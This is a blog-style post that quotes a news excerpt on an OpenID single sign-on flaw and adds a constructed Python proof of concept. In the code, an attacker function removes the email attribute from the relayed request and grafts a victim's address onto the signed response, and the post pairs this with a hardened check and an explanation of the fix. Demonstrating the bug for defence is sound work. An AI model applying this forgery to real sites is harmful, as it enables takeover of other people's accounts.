Study Finds Weaknesses in Single Sign-on Systems | Network World

In one of the flaws the researchers exposed, for example, not all websites confirmed that a verification coming from OpenID included all of the items the website asked to be confirmed, such as the first name, last name and email address. The researchers were able to access the request, delete one piece of requested information (the email address, for example) as it went to OpenID and simply re-insert it in the signed okay from OpenID. In this way, even a hacker who didn’t control the email address linked to the user’s account on the website in question could log in, and potentially make purchases, using that person’s account.

Link from danielmiessler.com
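The excerpt above compresses the attack into a few sentences, so here is a constructed, runnable reconstruction of it. This is added example code, not code from the study, from Network World or from this site: the provider, the relying party (RP), the shared association key, the user records and the account table are all stand-ins, and the signature scheme is the OpenID 2.0 key-value-form HMAC with attributes carried over Attribute Exchange (AX). The point it makes is the one in the article: the signature only covers the fields named in `openid.signed`, so an RP that reads an attribute without checking that it appears in that list will accept an attribute that was never signed.

```python
import base64
import hashlib
import hmac

# Constructed association MAC key shared by the RP and the OP (OpenID 2.0 HMAC-SHA256 association).
MAC_KEY = b"constructed-association-mac-key"
OP_ENDPOINT = "https://op.example/auth"            # hypothetical provider
RETURN_TO = "https://shop.example/openid/return"   # hypothetical relying party
AX_NS = "http://openid.net/srv/ax/1.0"
AX_TYPES = {  # attribute alias -> axschema type URI
    "firstname": "http://axschema.org/namePerson/first",
    "lastname": "http://axschema.org/namePerson/last",
    "email": "http://axschema.org/contact/email",
}
# Constructed user records at the provider, keyed by claimed identifier.
OP_USERS = {
    "https://op.example/id/alice": {"firstname": "Alice", "lastname": "Liddell", "email": "alice@example.com"},
    "https://op.example/id/bob": {"firstname": "Bob", "lastname": "Mallory", "email": "bob@example.com"},
}
# Constructed account table at the RP: the verified e-mail selects the local account.
RP_ACCOUNTS = {"alice@example.com": "alice-account-42"}


def kv_form(fields, signed):
    """OpenID 2.0 key-value form over the fields listed in openid.signed (names without the 'openid.' prefix)."""
    return "".join(f"{name}:{fields['openid.' + name]}\n" for name in signed).encode()


def verify_signature(resp):
    """Recompute openid.sig over the fields named in openid.signed; any other field is simply not covered."""
    signed = resp["openid.signed"].split(",")
    expected = hmac.new(MAC_KEY, kv_form(resp, signed), hashlib.sha256).digest()
    return hmac.compare_digest(base64.b64decode(resp["openid.sig"]), expected)


def rp_build_request(required=("firstname", "lastname", "email")):
    """The RP's checkid_setup request. It is relayed through the user's browser, so the user can edit it."""
    req = {"openid.mode": "checkid_setup", "openid.return_to": RETURN_TO,
           "openid.ns.ax": AX_NS, "openid.ax.mode": "fetch_request",
           "openid.ax.required": ",".join(required)}
    for alias in required:
        req[f"openid.ax.type.{alias}"] = AX_TYPES[alias]
    return req


def op_respond(req, identity):
    """Constructed OP: returns only the attributes the request asked for and signs every field it emits."""
    user = OP_USERS[identity]
    resp = {"openid.mode": "id_res", "openid.op_endpoint": OP_ENDPOINT,
            "openid.return_to": req["openid.return_to"],
            "openid.response_nonce": "2012-03-01T00:00:00Zconstructed",
            "openid.assoc_handle": "constructed-handle",
            "openid.claimed_id": identity, "openid.identity": identity,
            "openid.ns.ax": AX_NS, "openid.ax.mode": "fetch_response"}
    for alias in req["openid.ax.required"].split(","):
        resp[f"openid.ax.type.{alias}"] = req[f"openid.ax.type.{alias}"]
        resp[f"openid.ax.value.{alias}"] = user[alias]
    signed = [k[len("openid."):] for k in resp]
    resp["openid.signed"] = ",".join(signed)
    mac = hmac.new(MAC_KEY, kv_form(resp, signed), hashlib.sha256).digest()
    resp["openid.sig"] = base64.b64encode(mac).decode()
    return resp


def rp_login_vulnerable(resp, required=("firstname", "lastname", "email")):
    """The flaw in the article: checks the signature, then reads each requested attribute
    without checking that the attribute is one of the signed fields."""
    if not verify_signature(resp):
        return None
    attrs = {alias: resp[f"openid.ax.value.{alias}"] for alias in required}
    return RP_ACCOUNTS.get(attrs["email"])


def rp_login_hardened(resp, required=("firstname", "lastname", "email")):
    """Fix: every attribute the RP relies on must be present, carry the expected type URI and be
    listed in openid.signed. 'required' is the RP's own configuration, not the relayed request."""
    if not verify_signature(resp):
        return None
    signed = set(resp["openid.signed"].split(","))
    if "ns.ax" not in signed or resp.get("openid.ns.ax") != AX_NS:
        return None
    for alias in required:
        if f"ax.type.{alias}" not in signed or f"ax.value.{alias}" not in signed:
            return None  # never returned by the OP, or grafted on after signing
        if resp.get(f"openid.ax.type.{alias}") != AX_TYPES[alias]:
            return None
    return RP_ACCOUNTS.get(resp["openid.ax.value.email"])


def attacker_session(victim_email="alice@example.com"):
    """Bob signs in with his own OP account, drops 'email' from the relayed request so the OP signs
    no email at all, then grafts the victim's address onto the signed response before it reaches the RP."""
    req = rp_build_request()
    req["openid.ax.required"] = ",".join(a for a in req["openid.ax.required"].split(",") if a != "email")
    resp = op_respond(req, "https://op.example/id/bob")  # validly signed, but carries no email
    resp["openid.ax.type.email"] = AX_TYPES["email"]
    resp["openid.ax.value.email"] = victim_email
    return resp


def honest_session(identity="https://op.example/id/alice"):
    return op_respond(rp_build_request(), identity)


if __name__ == "__main__":
    forged = attacker_session()
    print("signature still verifies:", verify_signature(forged))
    print("vulnerable RP logs the attacker in as:", rp_login_vulnerable(forged))
    print("hardened RP rejects the forged response:", rp_login_hardened(forged) is None)
    print("hardened RP accepts an honest login:", rp_login_hardened(honest_session()))
```

Two things in the hardened version matter beyond the literal check. The list of attributes the RP insists on lives in the RP's own configuration, because the request it sent was relayed through the attacker's browser and cannot be trusted to say what was asked for; and the check covers the type URI as well as the value, since an alias such as `email` is only meaningful once it is bound to the signed `ax.type.email`. Real OpenID libraries expose the signed field list for exactly this purpose; the vulnerable pattern is reading `ax.value.*` straight from the query string.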
